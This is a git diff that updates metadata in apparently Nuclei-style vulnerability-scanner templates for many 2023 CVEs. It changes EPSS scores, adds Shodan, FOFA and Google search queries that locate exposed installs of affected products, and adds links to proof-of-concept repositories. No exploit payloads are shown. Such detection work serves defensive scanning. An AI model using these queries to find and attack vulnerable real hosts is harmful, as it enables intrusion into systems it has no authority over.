http.html:/wp-content/plugins/woocommerce-payments + fofa-query: body=/wp-content/plugins/woocommerce-payments publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index c35c2de2ca..fcd204123a 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2813 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44236 + epss-score: 0.00127 + epss-percentile: 0.47427 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 1627b69968..9dff7a231f 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -20,14 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2822 cwe-id: CWE-79 - epss-score: 0.03167 - epss-percentile: 0.90173 + epss-score: 0.05264 + epss-percentile: 0.9303 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ellucian product: ethos_identity shodan-query: html:"Ellucian Company" + fofa-query: body="ellucian company" google-query: "login with ellucian ethos identity" tags: cve2023,cve,cas,xss,ellucian diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 1075e2abe9..787dee5950 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 - epss-score: 0.09134 - epss-percentile: 0.94495 + epss-score: 0.12203 + epss-percentile: 0.95384 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: gitlab product: gitlab shodan-query: title:"Gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2023,cve,gitlab,lfi,authenticated,intrusive variables: data: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index c2a470fbef..f585a3339a 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -15,19 +15,21 @@ info: - https://apsystems.com - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2023-28343 + - https://github.com/hba343434/CVE-2023-28343 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-28343 cwe-id: CWE-78 - epss-score: 0.32424 - epss-percentile: 0.96608 + epss-score: 0.84636 + epss-percentile: 0.98506 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apsystems product: energy_communication_unit_firmware shodan-query: title:"Altenergy Power Control Software" + fofa-query: title="altenergy power control software" google-query: intitle:"Altenergy Power Control Software" tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 19839d49a6..5ca8a98bc4 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.14173 - epss-percentile: 0.95219 + epss-score: 0.93873 + epss-percentile: 0.9913 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: minio shodan-query: title:"Minio Console" fofa-query: app="Minio" + google-query: intitle:"minio browser" tags: cve,cve2023,minio,console,exposure,kev http: diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index f4c634ca3c..29a46f059e 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28662 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31593 + epss-score: 0.01065 + epss-percentile: 0.8414 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: codemenschen product: gift_vouchers framework: wordpress + shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 59c897347a..bd09147e59 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 - https://nvd.nist.gov/vuln/detail/CVE-2023-28665 + - https://github.com/JoshuaMart/JoshuaMart + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-28665 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38107 + epss-score: 0.00092 + epss-percentile: 0.39168 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index f8d3819e51..01974f4433 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-29084 cwe-id: CWE-77 - epss-score: 0.45632 - epss-percentile: 0.97324 + epss-score: 0.37079 + epss-percentile: 0.97178 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 3dd5911411..615ee4c5c7 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.75811 - epss-percentile: 0.97904 + epss-score: 0.94803 + epss-percentile: 0.99269 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -30,6 +30,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 7bbaaffeb2..4348a5cf2b 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29300 cwe-id: CWE-502 - epss-score: 0.96369 - epss-percentile: 0.99526 + epss-score: 0.9695 + epss-percentile: 0.99724 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -30,6 +30,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: callback: "{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index a7ef387adf..1e5f64ba57 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-29357 - epss-score: 0.10699 - epss-percentile: 0.9456 + epss-score: 0.82086 + epss-percentile: 0.9838 cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index cb8b18243d..387586c233 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29439 cwe-id: CWE-79 - epss-score: 0.00087 - epss-percentile: 0.35426 + epss-score: 0.00161 + epss-percentile: 0.52668 cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: fooplugins product: foogallery framework: wordpress + shodan-query: http.html:/wp-content/plugins/foogallery/ + fofa-query: body=/wp-content/plugins/foogallery/ publicwww-query: "/wp-content/plugins/foogallery/" tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index b511f09fb5..7796934275 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -15,14 +15,17 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2948 cwe-id: CWE-79 + epss-score: 0.0031 + epss-percentile: 0.69965 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - vendor: open-emr - product: openemr - fofa-query: app="OpenEMR" - shodan-query: http.favicon.hash:1971268439 verified: true max-request: 1 + vendor: open-emr + product: openemr + shodan-query: http.favicon.hash:1971268439 + fofa-query: app="OpenEMR" + google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr http: diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e73411002b..291dba12ef 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -30,6 +30,8 @@ info: vendor: cpanel product: cpanel shodan-query: title:"cPanel" + fofa-query: title="cpanel - api codes" + google-query: intitle:"cpanel - api codes" tags: cve,cve2023,cpanel,xss http: diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 250149ced7..8a280e65d8 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -17,12 +17,13 @@ info: cwe-id: CWE-79 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - vendor: open-emr - product: openemr - fofa-query: app="OpenEMR" - shodan-query: http.favicon.hash:1971268439 verified: true max-request: 1 + vendor: open-emr + product: openemr + shodan-query: http.favicon.hash:1971268439 + fofa-query: app="OpenEMR" + google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr http: diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 9bf1169f66..e17ed58564 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29622 cwe-id: CWE-89 - epss-score: 0.01215 - epss-percentile: 0.83777 + epss-score: 0.02992 + epss-percentile: 0.90889 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 3d9f1ab7bc..fc3fca33d9 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29623 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39785 + epss-score: 0.00135 + epss-percentile: 0.48708 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 2875a9c12c..02789b70ce 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2982 cwe-id: CWE-288 - epss-score: 0.01566 - epss-percentile: 0.86966 + epss-score: 0.01321 + epss-percentile: 0.85956 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 46f7357b4a..dd030fe1a8 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29827 cwe-id: CWE-74 - epss-score: 0.34849 - epss-percentile: 0.97005 + epss-score: 0.09885 + epss-percentile: 0.94826 cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 007a2a898d..19915b1819 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29887 cwe-id: CWE-22 - epss-score: 0.00439 - epss-percentile: 0.721 + epss-score: 0.00553 + epss-percentile: 0.7749 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 135a9b9ed2..c13b61d3fb 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -20,14 +20,14 @@ info: cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 - epss-score: 0.01262 - epss-percentile: 0.84199 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* + epss-score: 0.54171 + epss-percentile: 0.97625 + cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec - product: solarview_compact_firmware + product: solarview_compact shodan-query: http.html:"SolarView Compact" tags: cve,cve2023,lfi,solarview,edb,contec diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index bf1c5ccaef..481b36b276 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -13,13 +13,16 @@ info: reference: - https://github.com/PowerJob/PowerJob/issues/585 - https://nvd.nist.gov/vuln/detail/CVE-2023-29922 + - https://github.com/CN016/Powerjob-CVE-2023-29922- + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/1820112015/CVE-2023-29923 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-29922 cwe-id: CWE-1188 - epss-score: 0.00791 - epss-percentile: 0.79603 + epss-score: 0.00822 + epss-percentile: 0.81865 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 2ec2422aee..d583d153f9 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -13,19 +13,23 @@ info: reference: - https://github.com/PowerJob/PowerJob/issues/587 - https://nvd.nist.gov/vuln/detail/CVE-2023-29923 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Le1a/CVE-2023-29923 + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-29923 cwe-id: CWE-276 - epss-score: 0.00336 - epss-percentile: 0.68252 + epss-score: 0.01633 + epss-percentile: 0.8751 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powerjob product: powerjob + shodan-query: http.html:"powerjob" fofa-query: app="PowerJob" tags: cve2023,cve,powerjob,unauth diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 264135b800..7b305e3445 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30013 cwe-id: CWE-78 - epss-score: 0.9257 - epss-percentile: 0.98815 + epss-score: 0.96305 + epss-percentile: 0.99539 cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 50f4f54e0d..d6e7cfa5b3 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30019 cwe-id: CWE-918 - epss-score: 0.00094 - epss-percentile: 0.38689 + epss-score: 0.0016 + epss-percentile: 0.52577 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index b2d26e1d2f..f7aff3b56b 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30150 cwe-id: CWE-89 - epss-score: 0.0409 - epss-percentile: 0.91941 + epss-score: 0.04505 + epss-percentile: 0.92462 cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 031c0b56bf..50a5e1519b 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30210 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29245 + epss-score: 0.00113 + epss-percentile: 0.44693 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 6537669de8..2189a95c4e 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30212 cwe-id: CWE-79 - epss-score: 0.02578 - epss-percentile: 0.89997 + epss-score: 0.03007 + epss-percentile: 0.90911 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 7904f9a208..c934e88c87 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30256 cwe-id: CWE-79 - epss-score: 0.0206 - epss-percentile: 0.87855 + epss-score: 0.00895 + epss-percentile: 0.8263 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul http: diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index a5c4a2258f..8566de4134 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -13,13 +13,14 @@ info: - https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258 - http://packetstormsecurity.com/files/175672/MagnusBilling-Remote-Command-Execution.html - https://github.com/magnussolution/magnusbilling7/commit/ccff9f6370f530cc41ef7de2e31d7590a0fdb8c3 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-30258 cwe-id: CWE-78 - epss-score: 0.48813 - epss-percentile: 0.97205 + epss-score: 0.25604 + epss-percentile: 0.96696 cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: magnussolution product: magnusbilling shodan-query: http.html:"magnusbilling" + fofa-query: body="magnusbilling" tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution http: diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 620df48b01..317126eea6 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-30534 cwe-id: CWE-502 epss-score: 0.09326 - epss-percentile: 0.94158 + epss-percentile: 0.94688 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: cacti product: cacti shodan-query: title:"Cacti" + fofa-query: icon_hash="-1797138069" + google-query: intitle:"cacti" tags: cve,cve2023,cacti,authenticated http: diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index f760b82b3d..cb4d80cec2 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-30625 cwe-id: CWE-89 - epss-score: 0.94833 - epss-percentile: 0.99223 + epss-score: 0.94887 + epss-percentile: 0.99286 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index c30c0baedf..6db19106f8 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -21,14 +21,13 @@ info: epss-percentile: 0.50816 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: inspireui product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index a3784c4e80..ea14897000 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30777 cwe-id: CWE-79 - epss-score: 0.00338 - epss-percentile: 0.70791 + epss-score: 0.00527 + epss-percentile: 0.76946 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index a1c8a9246e..b5a5248335 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30868 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28435 + epss-score: 0.00114 + epss-percentile: 0.44861 cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 5622e5128f..70421c8cae 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -19,14 +19,16 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30943 cwe-id: CWE-610,CWE-73 - epss-score: 0.01661 - epss-percentile: 0.87339 + epss-score: 0.01155 + epss-percentile: 0.84809 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: moodle product: moodle shodan-query: title:"Moodle" + fofa-query: title="moodle" + google-query: intitle:"moodle" tags: cve,cve2023,moodle,xss,rce,authenticated http: diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 98cab63fb6..c71f0a5eee 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-31059 cwe-id: CWE-22 - epss-score: 0.00393 - epss-percentile: 0.70614 + epss-score: 0.00878 + epss-percentile: 0.8245 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: product: repetier-server shodan-query: title:"Repetier-Server" fofa-query: title="Repetier-Server" + google-query: intitle:"repetier-server" tags: cve2023,cve,repetier,lfi,repetier-server http: diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 5511a3bccd..df4af1a7a0 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31446 - epss-score: 0.00066 - epss-percentile: 0.27828 + epss-score: 0.01982 + epss-percentile: 0.8876 cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: cassianetworks product: xc1000_firmware shodan-query: html:"Cassia Bluetooth Gateway Management Platform" + fofa-query: body="cassia bluetooth gateway management platform" tags: cve,cve2023,rce,cassia,gateway http: diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index a18e260a91..809e10ea89 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -14,14 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31465 - epss-score: 0.00841 - epss-percentile: 0.80295 + epss-score: 0.0156 + epss-percentile: 0.87192 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fsmlabs product: timekeeper shodan-query: http.favicon.hash:2134367771 + fofa-query: icon_hash=2134367771 tags: cve,cve2023,timekeeper,rce,oast,fsmlabs http: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index c7109ccf8f..1931ca6ce2 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-31548 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32076 + epss-score: 0.00089 + epss-percentile: 0.37968 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index 5bddf6b981..f901dafa16 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-32077 - cwe-id: CWE-321,CWE-798 - epss-score: 0.0006 - epss-percentile: 0.24707 + cwe-id: CWE-798,CWE-321 + epss-score: 0.08146 + epss-percentile: 0.94315 cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* metadata: verified: true @@ -20,6 +20,7 @@ info: vendor: gravitl product: netmaker shodan-query: html:"netmaker" + fofa-query: body="netmaker" tags: cve,cve2023,info-key,netmaker,exposure http: diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index 40e72fb07b..d5ae54008e 100644 